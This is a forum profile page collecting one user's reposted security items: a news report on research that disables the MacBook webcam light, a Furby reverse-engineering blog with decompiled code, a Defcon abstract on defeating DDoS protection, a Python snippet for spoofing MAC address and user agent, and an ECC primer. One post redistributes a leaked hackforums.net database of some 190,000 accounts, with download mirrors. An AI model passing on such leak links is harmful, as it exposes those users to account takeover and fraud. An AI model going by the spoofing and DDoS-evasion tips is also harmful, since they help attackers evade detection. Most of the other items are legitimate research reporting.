Everything posted by Nytro

  1. Research shows how MacBook Webcams can spy on their users without warning

By Ashkan Soltani and Timothy B. Lee
December 18 at 2:25 pm

The woman was shocked when she received two nude photos of herself by e-mail. The photos had been taken over a period of several months — without her knowledge — by the built-in camera on her laptop.

Fortunately, the FBI was able to identify a suspect: her high school classmate, a man named Jared Abrahams. The FBI says it found software on Abrahams’s computer that allowed him to spy remotely on her and numerous other women. Abrahams pleaded guilty to extortion in October. The woman, identified in court papers only as C.W., later identified herself on Twitter as Miss Teen USA Cassidy Wolf.

While her case was instant fodder for celebrity gossip sites, it left a serious issue unresolved. Most laptops with built-in cameras have an important privacy feature — a light that is supposed to turn on any time the camera is in use. But Wolf says she never saw the light on her laptop go on. As a result, she had no idea she was under surveillance.

That wasn’t supposed to be possible. While controlling a camera remotely has long been a source of concern to privacy advocates, conventional wisdom said there was at least no way to deactivate the warning light. New evidence indicates otherwise.

Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, said in a recent story in The Washington Post that the FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years.

Now research from Johns Hopkins University provides the first public confirmation that it’s possible to do just that, and demonstrates how. While the research focused on MacBook and iMac models released before 2008, the authors say similar techniques could work on more recent computers from a wide variety of vendors. In other words, if a laptop has a built-in camera, it’s possible someone — whether the federal government or a malicious 19-year-old — could access it to spy on the user at any time.

One laptop, many chips

The built-in cameras on Apple computers were designed to prevent this, says Stephen Checkoway, a computer science professor at Johns Hopkins and a co-author of the study. “Apple went to some amount of effort to make sure that the LED would turn on whenever the camera was taking images,” Checkoway says. The 2008-era Apple products they studied had a “hardware interlock” between the camera and the light to ensure that the camera couldn’t turn on without alerting its owner.

The cameras Brocker and Checkoway studied. (Matthew Brocker and Stephen Checkoway)

But Checkoway and his co-author, Johns Hopkins graduate student Matthew Brocker, were able to get around this security feature. That’s because a modern laptop is actually several different computers in one package. “There’s more than one chip on your computer,” says Charlie Miller, a security expert at Twitter. “There’s a chip in the battery, a chip in the keyboard, a chip in the camera.”

MacBooks are designed to prevent software running on the MacBook’s central processing unit (CPU) from activating its iSight camera without turning on the light. But researchers figured out how to reprogram the chip inside the camera, known as a micro-controller, to defeat this security feature.
In a paper called “iSeeYou: Disabling the MacBook Webcam Indicator LED,” Brocker and Checkoway describe how to reprogram the iSight camera’s micro-controller to allow the camera and light to be activated independently. That allows the camera to be turned on while the light stays off. Their research is under consideration for an upcoming academic security conference.

The researchers also provided us with a copy of their proof-of-concept software. In the video below, we demonstrate how the camera can be activated without triggering the telltale warning light.

Attacks that exploit microcontrollers are becoming more common. “People are starting to think about what happens when you can reprogram each of those,” Miller says. For example, he demonstrated an attack last year on the software that controls Apple batteries, which causes the battery to discharge rapidly, potentially leading to a fire or explosion. Another researcher was able to convert the built-in Apple keyboard into spyware using a similar method.

According to the researchers, the vulnerability they discovered affects “Apple internal iSight webcams found in earlier-generation Apple products, including the iMac G5 and early Intel-based iMacs, MacBooks, and MacBook Pros until roughly 2008.” While the attack outlined in the paper is limited to these devices, researchers like Charlie Miller suggest that the attack could be applicable to newer systems as well. “There’s no reason you can’t do it -- it’s just a lot of work and resources but it depends on how well [Apple] secured the hardware,” Miller says.

Apple did not reply to requests for comment. Brocker and Checkoway write in their report that they contacted the company on July 16. “Apple employees followed up several times but did not inform us of any possible mitigation plans,” the researchers write.

RATted out

The software used by Abrahams in the Wolf case is known as a Remote Administration Tool, or RAT. This software, which allows someone to control a computer from across the Internet, has legitimate purposes as well as nefarious ones. For example, it can make it easier for a school’s IT staff to administer a classroom full of computers.

Indeed, the devices the researchers studied were similar to MacBooks involved in a notorious case in Pennsylvania in 2008. In that incident, administrators at Lower Merion High School outside Philadelphia reportedly captured 56,000 images of students using the RAT installed on school-issued laptops. Students reported seeing a “creepy” green flicker that indicated that the camera was in use. That helped to alert students to the issue, eventually leading to a lawsuit.

But more sophisticated remote monitoring tools may already have the capabilities to suppress the warning light, says Morgan Marquis-Boire, a security researcher at the University of Toronto. He says that cheap RATs like the one used at Lower Merion High School may not have the ability to disable the hardware LEDs, but “you would probably expect more sophisticated surveillance offerings which cost hundreds of thousands of euros” to be stealthier.

He points to commercial surveillance products such as Hacking Team and FinFisher that are marketed for use by governments. FinFisher is a suite of tools sold by a European firm called the Gamma Group.
A company marketing document released by WikiLeaks indicated that FinFisher could be “covertly deployed on the Target Systems” and enable, among other things, “Live Surveillance through Webcam and Microphone.”

The Chinese government has also been accused of using RATs for surveillance purposes. A 2009 report from the University of Toronto described a surveillance program called GhostNet that the Chinese government allegedly used to spy on prominent Tibetans, including the Dalai Lama. The authors reported that “web cameras are being silently triggered, and audio inputs surreptitiously activated,” though it’s not clear whether the GhostNet software is capable of disabling camera warning lights.

Luckily, there’s an easy way for users to protect themselves. “The safest thing to do is to put a piece of tape on your camera,” Miller says.

Ashkan Soltani is an independent security researcher and consultant.

Source: Research shows how MacBook Webcams can spy on their users without warning
  2. So, as suggestions: 1. Disable JavaScript (temporarily) 2. Random user agent 3. Spoof the MAC address. Anything else?
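For suggestions 2 and 3, here is a minimal Python sketch, assuming a Linux box. It picks a user agent at random from a small placeholder pool and generates a random locally administered MAC address, then prints the ip link commands you would run as root to apply it. The interface name eth0 and the user-agent list are illustrative placeholders, not a recommendation:

import random

# Small placeholder pool; in practice you would use a larger, current list.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36",
    "Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0",
]

def random_user_agent():
    return random.choice(USER_AGENTS)

def random_mac():
    # First octet: set the "locally administered" bit (0x02) and clear
    # the multicast bit (0x01) so the address is valid for a NIC.
    first = (random.randint(0x00, 0xff) & 0xfe) | 0x02
    rest = [random.randint(0x00, 0xff) for _ in range(5)]
    return ":".join("%02x" % b for b in [first] + rest)

if __name__ == "__main__":
    print("User-Agent:", random_user_agent())
    mac = random_mac()
    # Commands to apply the new MAC on eth0 (run as root):
    print("ip link set dev eth0 down")
    print("ip link set dev eth0 address " + mac)
    print("ip link set dev eth0 up")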
  3. Reverse Engineering a Furby

Table of Contents
  • Introduction
  • About the Device
  • Inter-Device Communication
  • Reversing the Android App
  • Reversing the Hardware
  • Dumping the EEPROM
  • Decapping Proprietary Chips
  • SEM Imaging of Decapped Chips

Introduction

This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices. After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone laughed, and we all moved on with our lives. However, the joke didn’t stop there. Within two weeks, this same friend said they had a present for me. And that’s how I started reverse engineering a Furby.

About the Device

A Furby is an evil robotic children’s toy wrapped in colored fur. Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli. Since its original debut in 1998, the Furby apparently received a number of upgrades and new features. The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app.

Inter-Device Communication

As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app. However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols. Instead, a look at the official Hasbro Furby FAQ told a more interesting story:

Q. There is a high pitched tone coming from Furby and/or my iOS device.
A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals.

Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies. That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone. #badBIOS anyone?

This was easily confirmed by use of the mobile app which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby. The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app.

Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol. Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby.

Reversing the Android App

Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding. After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits:

$ unzip -q com.hasbro.furby.apk
$ d2j-dex2jar.sh classes.dex
dex2jar classes.dex -> classes-dex2jar.jar
$

Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files. I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd().
Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class:

private void sendComAirCmd(int paramInt)
{
    Logger.log(Deli.TAG, "sent command: " + paramInt);
    Integer localInteger1 = Integer.valueOf(paramInt);
    int i = 0x1F & localInteger1.intValue() >> 5;
    int j = 32 + (0x1F & localInteger1.intValue());
    ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2];
    ComAirWrapper localComAirWrapper1 = this.comairWrapper;
    localComAirWrapper1.getClass();
    arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F);
    ComAirWrapper localComAirWrapper2 = this.comairWrapper;
    localComAirWrapper2.getClass();
    arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F);

The name generalplus appears to identify the Taiwanese company General Plus, which “engage in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).” I was unable to find any public information about the GPLib/ComAir library. However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others.

The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself. Continuing to dig, I found the file libGPLibComAir.so:

$ file lib/armeabi/libGPLibComAir.so
lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped

Quick analysis on the binary showed that this was likely the code I had been looking for:

$ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command
0000787d T ComAir_GetCommand
00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode
000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand
00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode
000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode
00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode
000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode
000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode
00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode
00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo
000058cd T _Z13EncodeRegCodethPh
00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi
00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv
00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv
00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode
000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag
00004e05 T _ZN12C_ComAirCore6DecodeEPsi
00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs
00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv
0000547d T _ZN15C_ComAirEncoder11PlayCommandEi
000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi
00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv
0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi
000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv
000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode
000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv
00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv
000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi
000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs
00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv
000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList
00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi
00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif
00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf
00005369 T _ZN15C_ComAirEncoder4InitEv
000051f9 T _ZN15C_ComAirEncoderC1Ev
000050b9 T _ZN15C_ComAirEncoderC2Ev
00005351 T _ZN15C_ComAirEncoderD1Ev
00005339 T _ZN15C_ComAirEncoderD2Ev

I loaded the binary in IDA Pro and quickly confirmed my thought. The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function:

unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3)
{
    int v3; // ST0C_4@1
    int v4; // ST04_4@1
    int v5; // ST1C_4@1
    const void *v6; // ST18_4@1
    unsigned int v7; // ST14_4@1

    v3 = a1;
    v4 = a3;
    v5 = _JNIEnv::GetArrayLength();
    v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0);
    v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5);
    _JNIEnv::ReleaseShortArrayElements(v3);
    return v7;
}

Within C_ComAirCore::DecodeBuffer() resided a looping call to ComAir_DecFrameProc(), which appeared to be referencing some table of phase coefficients:

int __fastcall ComAir_DecFrameProc(int a1, int a2)
{
    int v2; // r5@1
    signed int v3; // r4@1
    int v4; // r0@3
    int v5; // r3@5
    signed int v6; // r2@5

    v2 = a1;
    v3 = 0x40;
    if ( ComAir_Rate_Mode != 1 )
    {
        v3 = 0x80;
        if ( ComAir_Rate_Mode == 2 )
            v3 = 0x20;
    }
    v4 = (a2 << 0xC) / 0x64;
    if ( v4 > (signed int)&PHASE_COEF[0x157F] )
        v4 = (int)&PHASE_COEF[0x157F];
    v5 = v2;
    v6 = 0;
    do
    {
        ++v6;
        *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10;
        v5 += 2;
    }
    while ( v3 > v6 );
    ComAirDec();
    return ComAir_GetCommand();
}

Near the end of the function was a call to the very large function ComAirDec(), which likely was decompiled with the incorrect number of arguments and performed the bulk of the audio decoding process. Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced.
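As an aside, the general idea behind this kind of audio data transfer is easy to demonstrate. The Python sketch below is emphatically not the ComAir protocol (the real modulation, framing, and frequencies are exactly what is being reverse engineered here); it is just a minimal binary frequency-shift keying modulator that writes one high-pitched tone per bit to a WAV file, with made-up frequencies and timing:

import math, struct, wave

RATE = 44100           # samples per second
F0, F1 = 17000, 19000  # made-up "0" and "1" tones, roughly mosquito-tone range
BIT_SECS = 0.01        # made-up duration of each bit

def modulate(data):
    # One sine-wave burst per bit, most significant bit first.
    samples = []
    for byte in data:
        for i in range(8):
            bit = (byte >> (7 - i)) & 1
            freq = F1 if bit else F0
            for n in range(int(RATE * BIT_SECS)):
                samples.append(math.sin(2 * math.pi * freq * n / RATE))
    return samples

def write_wav(path, samples):
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)   # 16-bit signed samples
        w.setframerate(RATE)
        w.writeframes(b"".join(struct.pack("<h", int(s * 32767)) for s in samples))

write_wav("command.wav", modulate(b"\x2a"))  # encode a single example byte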
Itching to continue onto reverse engineering the hardware, I began disassembling the device.

Reversing the Hardware

Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and the number of hidden screws. Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device. The heart of the Furby lies in the following two-piece circuit board:

Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version. Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, while the EEPROM chip (U2 on the board) was branded Shenzhen LIZE on the U.S. version, the French version was branded ATMEL:

The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy. This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro. This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it makes the chips harder to identify due to the lack of markings. However, one may still simply inspect the traces connected to the chip and infer its functionality from there. For now, let’s start with something more accessible and dump the exposed EEPROM.
Dumping the EEPROM

The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings:

By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption. The chip on the U.S. version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzhen LIZE.

Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board. Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air.

Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually. I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development.

Referencing the datasheet, we find that there are eight total pins to deal with. Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with. By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip. Since we only have one EEPROM, we can simply tie all three to ground. Likewise, pin 4 (GND) is also connected to ground.

Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines. SDA provides bi-directional serial data transfer, while SCL provides a clock signal.

Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode. Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts). Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it. Pin 8 (VCC) is also connected to the same positive power source.

After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip:

#include <Wire.h>

#define disk1 0x50 // Address of eeprom chip

byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress ) {
  byte rdata = 0x11;
  Wire.beginTransmission(deviceaddress);
  // Wire.write((int)(eeaddress >> 8)); // MSB
  Wire.write((int)(eeaddress & 0xFF)); // LSB
  Wire.endTransmission();
  Wire.requestFrom(deviceaddress, 1);
  if (Wire.available())
    rdata = Wire.read();
  return rdata;
}

void setup(void) {
  Serial.begin(9600);
  Wire.begin();
  unsigned int i, j;
  unsigned char b;
  // Read and print all 256 bytes as a 16x16 hex grid.
  for ( i = 0; i < 16; i++ ) {
    for ( j = 0; j < 16; j++ ) {
      b = i2c_eeprom_read_byte(disk1, (i * 16) + j);
      if ( (b & 0xf0) == 0 ) Serial.print("0"); // pad single hex digits
      Serial.print(b, HEX);
      Serial.print(" ");
    }
    Serial.println();
  }
}

void loop() {}

Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out. Since our EEPROM chip is only 256 bytes large, we are only using 8-bit memory addressing, hence using a single byte.
Larger memory capacities require use of larger address spaces (9 bits, 10 bits, and so on), which require two bytes to accompany all necessary address bits. Upon running the sketch, we are presented with the following output:

2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18
0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8

Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data. By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes.

Decapping Proprietary Chips

With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy. Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself. Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself. Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner.

First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of shears and cut around it.

Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed. The entire experiment took place in a fume hood, which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in.

Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size. Since I was working with a lower concentration nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between 1-3 hours.

“Medium” (left) and “Tiny” (right)

After each chip had been fully exposed and any leftover debris removed, I removed the beakers from the hot plate, let them cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the entirety of it poured onto filter paper. After rinsing each sample one or two more times with distilled water, the sample was then rinsed with acetone two or three times.

The large chip took the longest to finish simply due to the size of the attached circuit board fragment. About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed.
At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact:

About thirty minutes later, and with the addition of more nitric acid, all three samples were cleaned and ready for imaging:

SEM Imaging of Decapped Chips

The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings. Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM), with great thanks to Dr. William Fowle.

Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate. A few initial experimental SEM images were taken; however, a number of artifacts were present that severely affected the image quality. To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons. Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface.

After treatment, the samples were placed back in the SEM and imaged with greater success. Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture. The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification:

Unfortunately, as can be seen in the image above, the medium chip did not appear to have been cleaned completely in its nitric acid bath. Although it is believed to be a memory storage device of some sort (judging by optical images), it is impossible to discern any finer details from the SEM image.

A number of interesting features were found during the imaging process. The marking “GHG554” may be clearly seen directly west on the small chip. Additionally, in a similar font face, the marking “GFI392” may be seen in the south-east corner of the large chip:

Higher zoom images were also taken of generally interesting topology on the chips. For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips:

If you are familiar with any of these chips or their features, feedback would be greatly appreciated.

EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads.

Additional images taken throughout this project are available at: Flickr: mncoppola's Photostream

Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project:
  • Prof. Wil Robertson – College of Computer and Information Science @ NEU
  • Dr. Geoffrey Davies – Dept. of Chemistry & Chemical Biology @ NEU
  • Dr. William Fowle – Nanomaterials Instrumentation Facility @ NEU
  • Molly White
  • Kaylie DeHart

Source: Reverse Engineering a Furby | Michael Coppola's Blog
  4. Full Disclosure: The Internet Dark Age

  • Removing Governments' on-line stranglehold
  • Disabling NSA/GCHQ major capabilities (BULLRUN / EDGEHILL)
  • Restoring on-line privacy - immediately

by The Adversaries
Update 1 - Spread the Word
Uncovered – //NONSA//NOGCHQ//NOGOV - CC BY-ND

On September 5th 2013, Bruce Schneier wrote in The Guardian:

“The NSA also attacks network devices directly: routers, switches, firewalls, etc. Most of these devices have surveillance capabilities already built in; the trick is to surreptitiously turn them on. This is an especially fruitful avenue of attack; routers are updated less frequently, tend not to have security software installed on them, and are generally ignored as a vulnerability.”

“The NSA also devotes considerable resources to attacking endpoint computers. This kind of thing is done by its TAO – Tailored Access Operations – group. TAO has a menu of exploits it can serve up against your computer – whether you're running Windows, Mac OS, Linux, iOS, or something else – and a variety of tricks to get them on to your computer. Your anti-virus software won't detect them, and you'd have trouble finding them even if you knew where to look. These are hacker tools designed by hackers with an essentially unlimited budget. What I took away from reading the Snowden documents was that if the NSA wants in to your computer, it's in. Period.”

http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-secure-surveillance

The evidence provided by this Full-Disclosure is the first independent, technically verifiable proof that Bruce Schneier's statements are indeed correct. We explain how NSA/GCHQ:

  • Are Internet wiretapping you
  • Break into your home network
  • Perform 'Tailored Access Operations' (TAO) in your home
  • Steal your encryption keys
  • Can secretly plant anything they like on your computer
  • Can secretly steal anything they like from your computer
  • How to STOP this Computer Network Exploitation

Download: http://cryptome.org/2013/12/Full-Disclosure.pdf
  5. Defcon 21 - Kill 'Em All — DDoS Protection Total Annihilation!

Description: With the advent of paid DDoS protection in the forms of CleanPipe, CDN / Cloud or whatnot, the sitting ducks have stood up and donned armors... or so they think! We're here to rip apart this false sense of security by dissecting each and every mitigation technique you can buy today, showing you in clinical detail how exactly they work and how they can be defeated.

Essentially we developed a 3-fold attack methodology: stay just below red-flag rate thresholds, make our attack traffic look inconspicuous, emulate the behavior of a real networking stack with a human operator behind it in order to spoof the correct response to challenges, ??? PROFIT! We will explain all the required look-innocent headers, TCP / HTTP challenge-response handshakes, JS auth bypass, etc. etc. in meticulous detail. With that knowledge you too can be a DDoS ninja! Our PoC attack tool "Kill-em-All" will then be introduced as a platform to put what you've learned into practice, empowering you to bypass all DDoS mitigation layers and get straight through to the backend where havoc could be wrought. Oh, and for the skeptics among you, we'll be showing testing results against specific products and services.

As a battle-hardened veteran of the DDoS battlefield, Tony "MT" Miu has garnered invaluable experience and secrets of the trade, making him a distinguished thought leader in DDoS mitigation technologies. At Nexusguard, day in day out he deals with high-profile mission-critical clients, architecting for them full-scale DDoS mitigation solutions where failure is not an option. He has presented at DEF CON 20 and AVTokyo 2012 a talk titled "DDoS Black and White Kungfu Revealed", and at the 6th Annual HTCIA Asia-Pacific Conference a workshop titled "Network Attack Investigation".

With "Impossible is Nothing" as his motto, Dr. Lee never fails to impress with his ingenious implementation prowess. With years of SOC experience under his belt, systematic security engineering and process optimization are his specialties. As a testament to his versatility, Dr. Lee has previously presented at conferences across various disciplines including ACM VRCIA, ACM VRST, IEEE ICECS and IEEE ECCTD.

For more information please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Source: Defcon 21 - Kill 'Em All — DDoS Protection Total Annihilation!
  6. Offensive Security Bug Bounty Program
  7. hackforums.net - 190.000+ Accounts Leaked! #AntiSec

www.hackforums.net - DOWNLOAD (110MB UNZIPPED)
Mirror1: http://inventati.org/anonhacknews/leak/Hackforums.net%20%28200k%20users%29.sql
Mirror2: https://anonfiles.com/file/03e4cac3df6eb30ba9640c00474bc64a
Mirror3: http://bayfiles.net/file/11Nrt/8zK5wI/Hackforums.net_%28200k_users%29.zip

Enjoy. Posted by AnonHackNews

Source: AnonHackNews Blog: hackforums.net - 190.000+ Accounts Leaked! #AntiSec
  8. A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography

Published on October 24, 2013 05:00AM by Nick Sullivan.

Elliptic Curve Cryptography (ECC) is one of the most powerful but least understood types of cryptography in wide use today. At CloudFlare, we make extensive use of ECC to secure everything from our customers' HTTPS connections to how we pass data between our data centers.

Fundamentally, we believe it's important to be able to understand the technology behind any security system in order to trust it. To that end, we looked around to find a good, relatively easy-to-understand primer on ECC in order to share with our users. Finding none, we decided to write one ourselves. That is what follows.

Be warned: this is a complicated subject and it's not possible to boil it down to a pithy blog post. In other words, settle in for a bit of an epic because there's a lot to cover. If you just want the gist, the TL;DR is: ECC is the next generation of public key cryptography and, based on currently understood mathematics, provides a significantly more secure foundation than first generation public key cryptography systems like RSA. If you're worried about ensuring the highest level of security while maintaining performance, ECC makes sense to adopt. If you're interested in the details, read on.

The dawn of public key cryptography

The history of cryptography can be split into two eras: the classical era and the modern era. The turning point between the two occurred in 1977, when both the RSA algorithm and the Diffie-Hellman key exchange algorithm were introduced. These new algorithms were revolutionary because they represented the first viable cryptographic schemes where security was based on the theory of numbers; it was the first to enable secure communication between two parties without a shared secret. Cryptography went from being about securely transporting secret codebooks around the world to being able to have provably secure communication between any two parties without worrying about someone listening in on the key exchange.

Whitfield Diffie and Martin Hellman

Modern cryptography is founded on the idea that the key that you use to encrypt your data can be made public while the key that is used to decrypt your data can be kept private. As such, these systems are known as public key cryptographic systems. The first, and still most widely used of these systems, is known as RSA — named after the initials of the three men who first publicly described the algorithm: Ron Rivest, Adi Shamir and Leonard Adleman.

